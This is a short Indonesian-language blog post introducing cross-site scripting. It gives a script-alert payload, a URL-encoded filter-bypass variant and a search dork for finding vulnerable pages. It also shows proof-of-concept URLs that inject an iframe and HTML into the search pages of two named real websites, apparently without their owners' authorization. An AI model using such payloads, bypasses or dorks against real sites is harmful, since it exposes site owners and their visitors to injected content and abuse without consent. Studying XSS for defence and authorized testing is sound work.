Perkenalan dengan XSS
Cross Site Scripting atau XSS sebagaimana kita tau adalah celah keamanan pada website yang mengizinkan kita mengeksekusi tag html (beda dengan html injection) baik secara sementara (temporary) atau permanen (Persistent).
Itu penjelasan singkatnya, sekarang kita ke prakteknya:
Kita bisa melakukan XSS dengan menambahkan tag html pada address bar atau guestbook <-- ini udah jarang ada yang vuln :(
Contoh:
http://www.target.com/search.php?q=<script>alert('1');</script>
Tapi, ada yang memfilter tag diatas sehingga gagal untuk dieksekusi, tapi bisa diakali dengan ini:
http://www.target.com/search.php?q=%3cscript%3ealert('1');%3c/script%3e
Untuk lebih jelasnya bisa cari di google dengan keyword: "XSS Cheat Sheet"
Oke, saatnya pembuktian.
Kebetulan saya menemukan website yang vuln xss, pernah saya bahas di Cross Site Scripting on www.jembo.co.id
Dan target untuk percobaan ini tetap sama :D
P.O.C: http://www.jembo.co.id/search.php?cat=newsevent&q=%22%3Ciframe%20src=%22https://myheart-isyr.blogspot.com%22%20width=%22800%22%20height=%22500%22%3E%3C/iframe%3E
Dan ternyata, saya menemukan target lain dengan dork yang berbeda
Dork: inurl:search.asp?q=
P.O.C: https://www.bricklink.com/search.asp?q=8421%3Ch1%3EHalo%20mhanx%3C/h1%3E
Udah, segitu dulu deh. Nanti nulis lagi di lain kesempatan (udah kaya presenter aja bahasanya :P)
Dadah.... ^_^
0 Tanggapan:
Post a Comment